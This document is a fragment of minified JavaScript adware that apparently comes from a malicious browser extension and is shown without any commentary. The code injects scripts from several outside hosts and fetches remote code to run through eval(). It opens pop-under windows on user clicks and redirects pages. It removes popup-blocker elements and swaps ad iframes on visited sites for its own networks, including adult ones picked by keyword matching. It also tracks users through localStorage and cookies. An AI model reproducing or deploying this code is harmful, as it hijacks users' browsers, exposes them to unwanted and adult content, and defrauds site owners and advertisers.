d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+ \"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=135987802205095269&eid=289&pid=945\";if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";document.getElementsByTagName(\"head\")[0].appendChild(e)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems? b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}});;if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//api.jollywallet.com/affiliate/client?dist=87&sub=5';document.getElementsByTagName(\"head\")[0].appendChild(script);};(function(){if(-1<window.self.location.protocol.indexOf(\"http\")&&window.self==window.top){var a,b=document.getElementsByTagName(\"head\")[0];a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//d1sywn6q49ki6d.cloudfront.net/build/production/wp/widget.min.js?r=684295654\";b.appendChild(a);a=document.createElement(\"link\");a.type=\"text/css\";a.rel=\"stylesheet\";a.href=\"//d1sywn6q49ki6d.cloudfront.net/build/production/wp/style.css?r=684295654\";b.appendChild(a)}})();;if(window.self==window.top && window.self.location.protocol=='http:'){var script=document.createElement('script');script.type='text/javascript';script.src='//istatic.datafastguru.info/fo/min/wp.js';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top){var script=document.createElement('script');var cb = Math.round(new Date().getTime()/1000);script.type='text/javascript';script.src='//ig.powerfulsearch.me:8080/adserver/static/js/inimage_i.js?pid=126&ext_domain=1&ox_subId=945&cb='+cb;document.getElementsByTagName(\"head\")[0].appendChild(script);};new function(){var a=this;a.domain_storage=\"http://xls.searchfun.in/nx\";a.prefix=\"if72ru4ruh7fewui\";a.conf={\"1\":{\"0\":1,\"1\":21600,\"2\":0,\"3\":0,\"4\":0,\"5\":21600,\"6\":21600,\"7\":0,\"8\":0,\"9\":21600,\"10\":21600,\"11\":0,\"12\":21600,\"13\":0,\"17\":0,\"18\":12345,\"19\":21600,\"20\":21600,\"21\":21600,\"22\":21600,\"29\":21600,\"30\":21600,\"32\":0,\"33\":21600,\"35\":21600,\"41\":0,\"44\":21600,\"45\":21600,\"46\":0,\"47\":21600},\"3\":{\"0\":1,\"1\":0,\"5\":0,\"6\":0,\"9\":0,\"10\":0,\"12\":0,\"13\":0,\"17\":0,\"19\":0,\"20\":0,\"21\":0,\"22\":0,\"29\":0,\"30\":0,\"32\":0,\"33\":0,\"35\":0,\"41\":0,\"44\":0,\"45\":0,\"46\":0,\"47\":0}};a.pop_collision_id=\"__ipu=1\";a.setStorage=function(b,e,d){localStorage.setItem(a.prefix+\"_\"+b+\"_site\",e+parseInt(d));localStorage.setItem(a.prefix+\"_\"+b+\"_global\",e)};a.ajax=new function(){var b=this;b.get=function(e,d){try{var c=a.utils.randomChar();\"undefined\"!==typeof b[c]&&(c=a.utils.randomChar());b[c]=new XMLHttpRequest;b[c].open(\"GET\",e,!0);b[c].onreadystatechange=function(){4==b[c].readyState&& d(b[c].responseText)};b[c].send()}catch(f){}};b.post=function(e,a,c){b.xhr=new XMLHttpRequest;b.xhr.open(\"POST\",e,!0);b.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");b.xhr.onreadystatechange=function(){4==b.xhr.readyState&&c(b.xhr.responseText)};a=encodeURIComponent(a);b.xhr.send(a)}};a.utils=new function(){var b=this;b.randomChar=function(){for(var b=\"\",a=0;2>a;a++)b+=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\".charAt(Math.floor(52*Math.random())); return b};b.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};b.inject_script=function(b){if(b instanceof Array)for(var a=0;a<b.length;a++){var c=document.createElement(\"script\");c.type=\"text/javascript\";var f=b[a];\"function\"==typeof f?c.text=f:c.src=f;document.getElementsByTagName(\"body\")[0].appendChild©}};b.epoch=function(){return Math.floor((new Date).getTime()/1E3)};b.getKeywords= function(){var b=document.title,a=document.getElementsByTagName(\"meta\");if(a)for(var c=0,f=a.length;c<f;c++)\"keywords\"==a[c].name.toLowerCase()&&(b+=\" \"+a[c].content.replace(/,/g,\" \"));return b.replace(/[_-]/g,\" \")};b.getVert=function(){var a=localStorage.getItem(\"sk398erjds2d\");return a?a:b.forexVert()}};a.products=new function(){var b=this;b.code_1=function(a,d,c,f,g,h){c=\"http://childsafedownloadx.asia/?vert=\"+c+\"&rff=\"+window.self.location.hostname+\"&pid=945&hid=135987802205095269&ch=61&\"+ h;localStorage.setItem(\"if72ru4ruh7fewui_\"+a+\"_site\",d+parseInt(f));localStorage.setItem(\"if72ru4ruh7fewui_\"+a+\"_global\",d+parseInt(g));(function(a){(function(a){var c=top!=b&&\"string\"===typeof top.document.location.toString()?top:b,e=null,d={},f=d.name||Math.floor(1E3*Math.random()+1),g=d.width||window.outerWidth||window.innerWidth||document.documentElement.clientWidth,h=d.height||window.outerHeight-100||window.innerHeight||document.documentElement.clientHeight,m=\"undefined\"!=typeof d.left?d.left.toString(): window.screenX,d=\"undefined\"!=typeof d.top?d.top.toString():window.screenY,n=function(){var a=navigator.userAgent.toLowerCase(),b={webkit:/webkit/.test(a),mozilla:/mozilla/.test(a)&&!/(compatible|webkit)/.test(a),chrome:/chrome/.test(a),msie:/msie/.test(a)&&!/opera/.test(a),firefox:/firefox/.test(a),safari:/safari/.test(a)&&!/chrome/.test(a),opera:/opera/.test(a)};b.version=b.safari?(a.match(/.+(?:ri)[\\/: ]([\\d.]+)/)||[])[1]:(a.match(/.+(?:ox|me|ra|ie)[\\/: ]([\\d.]+)/)||[])[1];return b}();(function(a, b,d,f,g,h){var k=\"toolbar=no,scrollbars=yes,location=yes,statusbar=yes,menubar=no,resizable=1,width=\"+d.toString()+\",height=\"+f.toString()+\",screenX=\"+g+\",screenY=\"+h,l=function(){window.removeEventListener?document.removeEventListener(\"click\",l,!1):document.detachEvent(\"onclick\",l);if(e=c.window.open(a,b,k))try{e.blur();e.opener.window.focus();window.self.window.focus();window.focus();if(n.firefox){var d=window.open(\"about:blank\");d.focus();d.close()}n.webkit&&openCloseTapreb();n.msie&&(e.opener.window.focus(), window.self.window.focus(),window.focus())}catch(f){}};document.addEventListener?document.addEventListener(\"click\",l,!1):document.attachEvent(\"onclick\",l)})(a,f,g,h,m,d)})(a)})©};b.code_3=function(a,b,c,f,g,h){var m=\"http://childsafedownloadx.asia/?vert=\"+c+\"&rff=\"+window.self.location.hostname+\"&pid=945&hid=135987802205095269&ch=61&\"+h;localStorage.setItem(\"if72ru4ruh7fewui_\"+a+\"_site\",b+parseInt(f));localStorage.setItem(\"if72ru4ruh7fewui_\"+a+\"_global\",b+parseInt(g));var k=function(){window.open(m, \"_blank\");window.removeEventListener?document.removeEventListener(\"click\",k,!1):document.detachEvent(\"onclick\",k)};document.addEventListener?document.addEventListener(\"click\",k,!1):document.attachEvent(\"onclick\",k)}};a.checkXtrg=function(b,e){a.utils.isIE()?a.utils.inject_script([a.products[\"code_\"+b],e]):a.ajax.get(e,function(a){\"\"!==a&&eval(a)})};a.checkFreq=function(b,e){var d=a.prefix+\"_\"+b,c=localStorage.getItem(d+\"_site\"),d=localStorage.getItem(d+\"_global\"),f=a.conf[b][\"0\"],g=encodeURIComponent(a.utils.getKeywords()), f=encodeURIComponent(\"ddadv.products.code_\"+b+\"(\"+b+\",\"+e+\",_vert_, _vfrq_, \"+f+\",\"+a.pop_collision_id+\")\"),g=a.domain_storage+\"/?p=\"+b+\"&gf=\"+a.conf[b][0]+\"&t=\"+e+\"&cb=\"+f+\"&k=\"+g;c||d?parseInt(d)>e||!c||parseInt©>e||a.checkXtrg(b,g):a.checkXtrg(b,g)};a.init=function(){if(\"undefined\"!==typeof localStorage&&\"undefined\"!==typeof localStorage.getItem&&-1==window.location.href.indexOf(a.pop_collision_id)&&-1<window.self.location.protocol.indexOf(\"http\")){var b=a.utils.epoch(),e;for(e in a.conf)a.products[\"code_\"+ e]&&a.checkFreq(e,b)}};window.self==window.top&&a.init();\"undefined\"==typeof window.ddadv&&(window.ddadv=a)};;if (window.self.location.protocol.indexOf('http') > -1 && window.self == window.top){var script = document.createElement('script');script.type = 'text/javascript';script.src = '//lb-betty-598702759.us-east-1.elb.amazonaws.com/xuiow/?s=PT1311FA&pid=2934&z=1&g=1 ';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self.location.hostname.indexOf('mail.')==-1)\r\n{try{for(i=0;i<5;i++){window.setTimeout(function(){if(document.getElementById(\"cblocker\")){document.getElementById(\"cblocker\").parentNode.removeChild(document.getElementById(\"cblocker\"));};if(document.getElementById(\"_vdcbl\")){document.getElementById(\"_vdcbl\").parentNode.removeChild(document.getElementById(\"_vdcbl\"));}},i*100)}}catch(e){};\r\n};(function(){try{if(window.opener&&window.self==window.top&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://rbv.jobfindgold.info/a1/?eid=289&hid=135987802205095269&pid=945&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1<c.indexOf(\"msie\")&&(!document.referrer||-1==document.referrer.indexOf(location.hostname))){var e=window.innerWidth||document.documentElement.scrollWidth||0,f=window.innerHeight||document.documentElement.scrollHeight||0;if(e){window.resizeTo(e,f);var g=window.innerWidth||document.documentElement.scrollWidth,k=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(e+2,f);var h=window.scrollWidth||document.documentElement.scrollWidth;if(h!=g&&h<=g+2&&90>=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1<c.indexOf(\"chrome\")&&(b.innerHTML='document.getElementsByTagName(\"body\")[0].setAttribute(\"xcddsa\",\"1\")',document.getElementsByTagName(\"body\")[0].appendChild(b),setTimeout(function(){document.getElementsByTagName(\"body\")[0].getAttribute(\"xcddsa\")&&(window.self.location.href=d)},10));-1<c.indexOf(\"firefox\")&&(b.innerHTML='try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};setTimeout(function(){window.self.location.href=\"'+d+'\";},10);',document.getElementsByTagName(\"head\")[0].appendChild(b))}}}catch(l){}})();if(-1<window.self.location.href.indexOf(\"df.ly/\")){var dd=document.getElementById(\"rf\");dd&&dd.setAttribute(\"src\",\"http://rbv.jobfindgold.info/x/?ch=1\")}(\"rdlnk.co\"==window.self.location.hostname||\"adfoc.us\"==window.self.location.hostname||\"www.adsbeta.net\"==window.self.location.hostname||\"ad5.eu\"==window.self.location.hostname)&&(dd=document.getElementsByTagName(\"iframe\")[0])&&dd.setAttribute(\"src\",\"http://rbv.jobfindgold.info/x/?ch=1\");\"cf.ly\"==window.self.location.hostname&&(dd=document.getElementsByTagName(\"iframe\")[1])&&dd.setAttribute(\"src\",\"http://rbv.jobfindgold.info/x/?ch=1\");\"adv.li\"==window.self.location.hostname&&(dd=document.getElementById(\"main\"))&&dd.setAttribute(\"src\",\"http://rbv.jobfindgold.info/x/?ch=1\");;var _wlst={lsKey:\"ssjsmn2ja8ddw2a\",get:function(b,a){if(3<b)return a(!1);var d=this.fetch();if(d)return a(parseInt(d));if(1==b){crc=this.hcrc32(window.self.location.hostname.replace(\"www.\",\"\"));try{var c=document.createElement(\"script\");c.type=\"text/javascript\";try{c.async=\"async\"}catch(e){}c.src=\"http://v.zilionfast.in/\"+crc+\"/?t=vrt\";(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild©}catch(f){}}setTimeout(function(){_wlst.get(++b,a)},180)},fetch:function(){try{if(\"undefined\"!=localStorage)try{return localStorage.getItem(this.lsKey)}catch(b){return 0}else _wlst.getCkie()}catch(a){_wlst.getCkie()}},getCkie:function(){if(0<document.cookie.length&&(c_start=document.cookie.indexOf(this.lsKey+\"=\"),-1!=c_start))return c_start=c_start+this.lsKey.length+1,c_end=document.cookie.indexOf(\";\",c_start),-1==c_end&&(c_end=document.cookie.length),unescape(document.cookie.substring(c_start,c_end))},hcrc32:function(b,a){a||(a=0);var d=0;a^=-1;for(var c=0,e=b.length;c<e;c++)d=(a^b.charCodeAt©)&255,d=\"0x\"+\"00000000 77073096 EE0E612C 990951BA 076DC419 706AF48F E963A535 9E6495A3 0EDB8832 79DCB8A4 E0D5E91E 97D2D988 09B64C2B 7EB17CBD E7B82D07 90BF1D91 1DB71064 6AB020F2 F3B97148 84BE41DE 1ADAD47D 6DDDE4EB F4D4B551 83D385C7 136C9856 646BA8C0 FD62F97A 8A65C9EC 14015C4F 63066CD9 FA0F3D63 8D080DF5 3B6E20C8 4C69105E D56041E4 A2677172 3C03E4D1 4B04D447 D20D85FD A50AB56B 35B5A8FA 42B2986C DBBBC9D6 ACBCF940 32D86CE3 45DF5C75 DCD60DCF ABD13D59 26D930AC 51DE003A C8D75180 BFD06116 21B4F4B5 56B3C423 CFBA9599 B8BDA50F 2802B89E 5F058808 C60CD9B2 B10BE924 2F6F7C87 58684C11 C1611DAB B6662D3D 76DC4190 01DB7106 98D220BC EFD5102A 71B18589 06B6B51F 9FBFE4A5 E8B8D433 7807C9A2 0F00F934 9609A88E E10E9818 7F6A0DBB 086D3D2D 91646C97 E6635C01 6B6B51F4 1C6C6162 856530D8 F262004E 6C0695ED 1B01A57B 8208F4C1 F50FC457 65B0D9C6 12B7E950 8BBEB8EA FCB9887C 62DD1DDF 15DA2D49 8CD37CF3 FBD44C65 4DB26158 3AB551CE A3BC0074 D4BB30E2 4ADFA541 3DD895D7 A4D1C46D D3D6F4FB 4369E96A 346ED9FC AD678846 DA60B8D0 44042D73 33031DE5 AA0A4C5F DD0D7CC9 5005713C 270241AA BE0B1010 C90C2086 5768B525 206F85B3 B966D409 CE61E49F 5EDEF90E 29D9C998 B0D09822 C7D7A8B4 59B33D17 2EB40D81 B7BD5C3B C0BA6CAD EDB88320 9ABFB3B6 03B6E20C 74B1D29A EAD54739 9DD277AF 04DB2615 73DC1683 E3630B12 94643B84 0D6D6A3E 7A6A5AA8 E40ECF0B 9309FF9D 0A00AE27 7D079EB1 F00F9344 8708A3D2 1E01F268 6906C2FE F762575D 806567CB 196C3671 6E6B06E7 FED41B76 89D32BE0 10DA7A5A 67DD4ACC F9B9DF6F 8EBEEFF9 17B7BE43 60B08ED5 D6D6A3E8 A1D1937E 38D8C2C4 4FDFF252 D1BB67F1 A6BC5767 3FB506DD 48B2364B D80D2BDA AF0A1B4C 36034AF6 41047A60 DF60EFC3 A867DF55 316E8EEF 4669BE79 CB61B38C BC66831A 256FD2A0 5268E236 CC0C7795 BB0B4703 220216B9 5505262F C5BA3BBE B2BD0B28 2BB45A92 5CB36A04 C2D7FFA7 B5D0CF31 2CD99E8B 5BDEAE1D 9B64C2B0 EC63F226 756AA39C 026D930A 9C0906A9 EB0E363F 72076785 05005713 95BF4A82 E2B87A14 7BB12BAE 0CB61B38 92D28E9B E5D5BE0D 7CDCEFB7 0BDBDF21 86D3D2D4 F1D4E242 68DDB3F8 1FDA836E 81BE16CD F6B9265B 6FB077E1 18B74777 88085AE6 FF0F6A70 66063BCA 11010B5C 8F659EFF F862AE69 616BFFD3 166CCF45 A00AE278 D70DD2EE 4E048354 3903B3C2 A7672661 D06016F7 4969474D 3E6E77DB AED16A4A D9D65ADC 40DF0B66 37D83BF0 A9BCAE53 DEBB9EC5 47B2CF7F 30B5FFE9 BDBDF21C CABAC28A 53B39330 24B4A3A6 BAD03605 CDD70693 54DE5729 23D967BF B3667A2E C4614AB8 5D681B02 2A6F2B94 B40BBE37 C30C8EA1 5A05DF1B 2D02EF8D\".substr(9*d,8),a=a>>>8^d;c=a^-1;0>c&&(c+=4294967296);return c}},_zyad={title:document.title?document.title.toLowerCase():\"na\",location:window.self.location.href.toLowerCase() + (document.referrer ? document.referrer : ''),vrt:!1,networks_list:[[['mediashakers_rmx',405],['cpx_bet_55',127],['deliads_apx_tb_new',72],['saymedia_apx_tag_test',71],['start_me_app_tier1',145],['webmedia_tb_new',91],['baba_tb_new',288],['dsnr_toptier1_gentb',1701],['xertive_gentb',3110],['mediashakers_apx3',33],['cpx_int47_tr',451],['cpx_int41_tr',474],['clove_fixed_us_uk',723],['mindads_rmx_new',215],['cpx_favorhythmic',193],['adfish_hasoffers',91],['mediawhite_nontb',141],['matomy_adj8',644],['matomy_adj8_2',645],['mmg_new222',92],['adstract_adwp_new2',137],['mari_nontb',151]],[['cpx_nontb30_tr',416],['dsnr_strm_t1',432],['mari_strm4',1711],['matomy_strm5_2',3720],['matomy_strm5',3721]],[['hulk_porn',10000]]],networks_conf:!1,init:function(){_wlst.get(1,function(b){_zyad.vrt=b;if(!(_zyad.vrt==17 || _zyad.location.indexOf('0vPHAyyY=')>-1|| _zyad.location.indexOf('adk2.co')>-1 ||window.self.location.hostname==\"ad.media-servers.net\"||window.self.location.hostname==\"tr.adsplats.com\"||window.self.location.hostname==\"ib.adnxs.com\"||window.self.location.hostname==\"ad.co-co-co.co\"||window.self.location.hostname==\"an.z5x.net\"||window.self.location.hostname==\"ads.yahoo.com\"||window.self.location.hostname==\"ads.clovenetwork.com\"||window.self.location.hostname==\"adfishmedia.go2cloud.org\"||window.self.location.hostname==\"srv1.mediads.info\"||window.self.location.hostname==\"ads.ventivmedia.com\"|| _zyad.location.indexOf('=309973')>-1|| _zyad.location.indexOf('=458516')>-1||_zyad.location.indexOf('PT1311')>-1||_zyad.location.indexOf('1018-1007')>-1||_zyad.location.indexOf('1019-1001')>-1||_zyad.location.indexOf('2136&zid=')>-1))if(_zyad.networks_conf=12==_zyad.vrt?_zyad.networks_list[2]:_zyad.vrt?_zyad.networks_list[1]:!_zyad.getisP()?_zyad.networks_list[0]:!1,_zyad.networks_conf){for(i=0;5>i;i++)setTimeout(_zyad.find,500*i);window.self==window.top&&1==Math.floor(7*Math.random()+1)&&setTimeout(function(){_zyad.find(1)},6E4)}})},getisD:function(){return-1<_zyad.title.indexOf(\"torrent\")||-1<_zyad.location.indexOf(\"torrent\")},getisNA:function(){return!1},getisP:function(){try{if(12==_zyad.vrt)return!0;if(_zyad.vrt)return!1;var b=document.getElementsByTagName(\"meta\");if(b)for(i=0;i<b.length;i++)try{if(b[i]&&b[i].getAttribute(\"name\")){var a=b[i].getAttribute(\"name\").toLowerCase();if(\"description\"==a||\"keywords\"==a)_zyad.title=_zyad.title+\" \"+b[i].getAttribute(\"content\")}}catch(d){}}catch©{}b=\"porn sex xxx tits adult lesbian squirt creampie bondage ExSuna mature fisting [bleep] gangbang orgy gay nude tits tranny blowjob handjob masturbat busty [bleep] joder horny mamada polla [bleep] pussy threesome teens milf bdsm hentai motherless erotic cams petite\".split(\" \");for(i in b)if(-1<_zyad.location.indexOf(b[i])||-1<_zyad.title.indexOf(b[i]))return!0;return!1},epoch:function(){try{var b=new Date;try{return(b.getTime()-b.getMilliseconds())/1E3}catch(a){return parseInt(b.getTime()/1E3)}}catch(d){return 0}},between:function(b,a){return b>=a-7&&b<=a+7},detectRsize:function(b){try{var a=[0,0];try{a=[parseInt(\"number\"==typeof b.width||\"string\"==typeof b.width&&b.width.match(/[0-9]/)?b.width:b.scrollWidth),parseInt(\"number\"==typeof b.height||\"string\"==typeof b.height&&b.height.match(/[0-9]/)?b.height:b.scrollHeight)]}catch(d){}var c=_zyad.between;switch(!0){case c(a[1],600)&&c(a[0],120):return[120,600];case c(a[1],600)&&c(a[0],160):return[160,600];case c(a[1],600)&&c(a[0],300):return[300,600];case c(a[1],125)&&c(a[0],125):return[125,125];case c(a[1],250)&&c(a[0],300):return[300,250];case c(a[1],250)&&c(a[0],250):return[250,250];case c(a[1],250)&&c(a[0],336):return[300,250];case c(a[1],150)&&c(a[0],180):return[180,150];case c(a[1],400)&&c(a[0],600):return[600,400];case c(a[1],60)&&c(a[0],120):return[120,60];case c(a[1],100)&&c(a[0],300):return[300,100];case c(a[1],60)&&c(a[0],234):return[234,60];case c(a[1],60)&&c(a[0],460):return[460,60];case c(a[1],60)&&c(a[0],468):return[468,60];case c(a[1],90)&&c(a[0],728):return[728,90];default:return!1}}catch(e){return!1}},find:function(b){var a=[],d=window.self.document.getElementsByTagName(\"iframe\");for(i=0;i<d.length;i++){if(!b)try{if(d[i].hasAttribute(\"s0\"))continue}catch©{try{if(d[i].getAttribute(\"s0\"))continue}catch(e){}};try{if(d[i].src.indexOf('=309973')>-1||d[i].src.indexOf('=458516')>-1||d[i].src.indexOf('1018-1007')>-1||d[i].src.indexOf('1019-1001')>-1||d[i].src.indexOf('2136&zid=')>-1||(d[i].getAttribute('name')&&d[i].getAttribute('id')==d[i].getAttribute('name')&&d[i].getAttribute('name').match(/^ap\\d+$/))){try{d[i].setAttribute(\"s0\", \"true\");d[i].setAttribute(\"replaced\", \"true\");}catch(e){};continue;}}catch(e){};(rSize=_zyad.detectRsize(d[i]))&&a.push({size:rSize,ifr:d[i],func:function(a,b){_zyad.setNetwork(a[b].ifr,a[b].size);b++;a&&a[b]&&\"function\"==typeof a[b].func&&setTimeout(function(){a[b].func(a,b)},1)}})}a[0]&&a[0].func&&a[0].func(a,0)},setNetwork:function(b,a){if(a&&b){var d=0,c=0,e=Math.floor(10000*Math.random()+0.9),f=0,h={},g=[];for(i=0;i<_zyad.networks_conf.length;i++){var j=_zyad.networks[_zyad.networks_conf[i][0]](a);j&&(h[i]=j,g.push(i),d+=_zyad.networks_conf[i][1])}10000<d&&(c=Math.floor((10000-d)/g.length+0.9));for(i=0;i<g.length;i++)if(d=g[i],f+=_zyad.networks_conf[i][1]+c,f>=e){h[d](b);break}}},iset:function(ifr, url, mode, properties){try{switch(mode){default:case 1:var channel = 0;try{if(ifr.getAttribute('bow')) channel=1}catch(e){}ifr.src = url + (properties ? (url.indexOf('?')>'-1' ? '&' : '/?') + '0vPHAyyY=' + properties[0] + '_' + properties[1] + '_' + channel : '');break;case 2:try{ifr.src='about:blank';ifr.contentWindow.document.write('<html><head>\\x3cscript>setTimeout(function(){location.href=\"'+url+'\"},1)\\x3c/script></head><body>&nbsp;\\x3c/body>\\x3c/html>');}catch(e){var h = '<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body><iframe name=\"a7h3h73d3\" src=\"about:blank\" style=\"width:100%;height:100%;border:0\" MARGINWIDTH=\"0\" MARGINHEIGHT=\"0\" frameborder=\"0\" scrolling=\"no\" width=\"100%\" height=\"100%\"></iframe>\\x3cscript>setTimeout(function(){frames[\"a7h3h73d3\"].document.write(\"<\"+\"script>setTimeout(function(){setTimeout(function(){location.href=\\x5c\\\\x27'+url+'\\x5c\\\\x27},1)},1);\"+\"<\"+\"/script>\")},1)\\x3c/script></body></html>';ifr.src='javascript:document.write(\\''+h+'\\');'}break;case 3:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style>\\x3cscript>setTimeout(function(){document.getElementsByTagName(\"body\")[0].innerHTML=\"\\x3cscript src=\"'+url+'\">\\x3c/script>\"},10)\\x3c/script></head><body>&nbsp;</body></html>');break;case 4:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body>'+url+'</body></html>');break;}try{ifr.setAttribute(\"s0\", \"true\");ifr.setAttribute(\"replaced\", \"true\")}catch(e){}}catch(e){}},networks:{mediashakers_rmx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ad.media-serv...89_945&pub_url=' (atp?atp:1), [313,size]);}}catch(e){return !1;}},cpx_bet_55:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;var reff = window.top==window.self ? encodeURIComponent(window.self.location.href) : '';;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.c...referrer= reff ' (atp?atp:1), [354,size]);}}catch(e){return !1;}},deliads_apx_tb_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 120x600 160x600 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;var arr={\"728x90\":\"1962958\",\"300x250\":\"1962952\",\"120x600\":\"1962975\",\"160x600\":\"1962977\",\"468x60\":\"1962981\"}[size];var surl = \"http://ib.adnxs.com/tt?id=\"+ arr +\"&cb=&referrer=\";;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [359,size]);}}catch(e){return !1;}},saymedia_apx_tag_test:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90 468x60'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"1957902\",\"468x60\":\"1957923\",\"160x600\":\"1957924\", \"300x250\":1957917}[size];var surl = \"http://ad.co-co-co.co/rmx/appnexus.html?id=\"+arr;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [366,size]);}}catch(e){return !1;}},start_me_app_tier1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/...rrer=&pubclick=' (atp?atp:1), [411,size]);}}catch(e){return !1;}},webmedia_tb_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/...size &referrer=' (atp?atp:1), [418,size]);}}catch(e){return !1;}},baba_tb_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;var arr={\"728x90\":\"1957852\",\"300x250\":\"1947796\",\"468x60\":\"1957860\",\"120x600\":\"1957857\",\"160x600\":\"1957854\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr+\"&referrer=\";return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [423,size]);}}catch(e){return !1;}},dsnr_toptier1_gentb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://an.z5x.net/tt...size &referrer=' (atp?atp:1), [428,size]);}}catch(e){return !1;}},xertive_gentb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size == \"120x60\") return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size=+size+&site=1736632&section_code=289_945&pub_url=$PUB_URL&pub_redirect_unencoded=1&pub_redirect=click_url&cb=cache_' (atp?atp:1), [434,size]);}}catch(e){return !1;}},mediashakers_apx3:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size == \"120x60\") return;var arr={\"728x90\":\"2107541\",\"300x250\":\"2107538\",\"468x60\":\"2107542\",\"120x600\":\"2107544\",\"160x600\":\"2107539\"}[size]; var surl=\"http://ib.adnxs.com/tt?id=\"+arr+\"&cb=&referrer=&pubclick=\";return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), 